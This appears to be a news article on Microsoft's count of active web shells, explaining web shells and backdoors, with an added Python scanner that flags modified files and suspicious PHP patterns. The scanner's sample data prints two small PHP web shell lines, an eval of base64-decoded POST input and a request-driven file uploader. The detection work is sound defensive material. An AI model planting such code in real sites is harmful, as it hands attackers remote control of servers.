In a blog post promoting the capabilities of its commercial security platform — the Microsoft Defender ATP — Microsoft said that on a daily basis the company’s security team detects and tracks on average around 77,000 active web shells, spread across 46,000 infected servers.
But while the Microsoft blog post goes on to promote Defender ATP’s industry-recognized detection capabilities, the nugget in Microsoft’s recent marketing material is the 77,000 and 46,000 daily statistics.
These two numbers are staggering in terms of size, especially the 77,000 figure, which is far larger than any previous report about web shell prevalence.
For example, earlier this month GoDaddy’s Sucuri reported cleaning around 3,600 web shells from hacked websites during all of 2019, a number dwarfed by Microsoft’s daily detection count.
What’s a web shell?
Microsoft’s numbers highlight the prevalence of these tools in today’s hackers’ arsenals — where web shells are considered a must for every threat actor, from lowly hacktivist groups defacing websites to state-sponsored cyber-espionage groups.
Web shells are crucial because of what they let an attacker do. For non-technical ZDNet readers who have not encountered the term until today, a “web shell” refers to a malicious program or script that’s installed on a hacked server.
They provide a visual interface that hackers can use to interact with the hacked server and its filesystem. Most web shells contain basic functions to rename, copy, move, and even edit or upload new files on a server. They can also be used to change file and directory permissions, or archive and download (steal) data from the server.
Hackers usually install web shells by exploiting vulnerabilities in internet-facing servers or web applications (such as CMS, CMS plugins, CMS themes, CRMs, intranets, etc.).
Web shells can be written in any programming language, from Go to PHP. This allows hackers to hide web shells inside any website’s code under generic names (like index.asp or uploader.php), which makes detection by a human operator almost impossible without the aid of a web firewall or web malware scanner.
If a web shell is discovered, a backdoor script is also often nearby. Web shells and backdoor scripts are often used together. Hackers usually breach a server, plant a web shell to allow them to interact with its filesystem, and then they install a backdoor — which is an automated script that reinstalls the web shell at regular intervals, or keeps alive a way for the hacker to reinfect the server if the web shell is ever discovered and removed.
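As an added illustration of the scanner-assisted detection described above (not Microsoft’s or Sucuri’s code), the following Python sketch compares a web root against a hashed baseline, so that files a backdoor quietly re-plants show up on the next run, and applies simple content heuristics to the changed files. The directory layout, file contents and indicator names are constructed samples.

```python
import hashlib
import re
from typing import Dict, List

# Constructed snapshots of a web root (path -> file text); not real site data.
BASELINE_FILES = {
    "index.php": "<?php require 'wp-blog-header.php';",
    "wp-content/plugins/seo/seo.php": "<?php function seo_title($t) { return trim($t); }",
}
CURRENT_FILES = {
    # same file, but with a line appended after the baseline was taken
    "index.php": "<?php require 'wp-blog-header.php';\n@eval(base64_decode($_POST['c']));",
    "wp-content/plugins/seo/seo.php": "<?php function seo_title($t) { return trim($t); }",
    # a generically named script dropped into a directory that should hold only media
    "wp-content/uploads/2020/uploader.php":
        "<?php if(isset($_REQUEST['f'])){ move_uploaded_file($_FILES['f']['tmp_name'], $_REQUEST['d']); }",
}

# Heuristic indicators: code execution fed by request data, obfuscation wrappers, upload primitives.
DANGEROUS = re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(")
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|FILES)\b")
OBFUSCATION = re.compile(r"\b(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(")
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")
UPLOAD_DIRS = ("wp-content/uploads/", "uploads/", "media/")

def build_baseline(files: Dict[str, str]) -> Dict[str, str]:
    """Hash every file once the site is known-clean; store this outside the web root."""
    return {p: hashlib.sha256(c.encode()).hexdigest() for p, c in files.items()}

def changed_paths(baseline: Dict[str, str], files: Dict[str, str]) -> List[str]:
    """Files that are new or whose hash no longer matches the baseline (catches re-planted shells)."""
    return sorted(p for p, c in files.items()
                  if baseline.get(p) != hashlib.sha256(c.encode()).hexdigest())

def content_indicators(text: str) -> List[str]:
    hits = []
    if DANGEROUS.search(text) and REQUEST_INPUT.search(text):
        hits.append("code-exec-on-request-input")
    if OBFUSCATION.search(text) and DANGEROUS.search(text):
        hits.append("obfuscated-code-exec")
    if "move_uploaded_file" in text and REQUEST_INPUT.search(text):
        hits.append("file-upload-on-request-input")
    return hits

def scan(baseline: Dict[str, str], files: Dict[str, str]) -> Dict[str, List[str]]:
    """Only changed files are inspected, so a large site stays cheap to re-scan on a schedule."""
    findings = {}
    for path in changed_paths(baseline, files):
        reasons = ["new-or-modified-since-baseline"]
        if path.startswith(UPLOAD_DIRS) and path.lower().endswith(SCRIPT_EXT):
            reasons.append("script-in-upload-dir")
        reasons += content_indicators(files[path])
        findings[path] = reasons
    return findings
```

Run `scan(build_baseline(BASELINE_FILES), CURRENT_FILES)` to see both the appended line in index.php and the new uploader.php flagged; on a real host you would populate the dictionaries by walking the web root and treat every hit as a lead to inspect, not a verdict.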
Today’s most popular web shell is, by far, a tool called China Chopper. First spotted in 2012, this small but feature-packed web shell is the work of Chinese hackers. It was released on a Chinese hacking forum, from where it was universally adopted by almost every threat actor across the globe.
In its blog post yesterday, Microsoft warned system administrators to take web shells seriously. Based on its past investigations, Microsoft says hackers often use web shells to upload other hacking tools to a victim’s systems, tools that are later used for reconnaissance operations and lateral movement across a victim’s internal network, turning simple web server hacks into much bigger security incidents.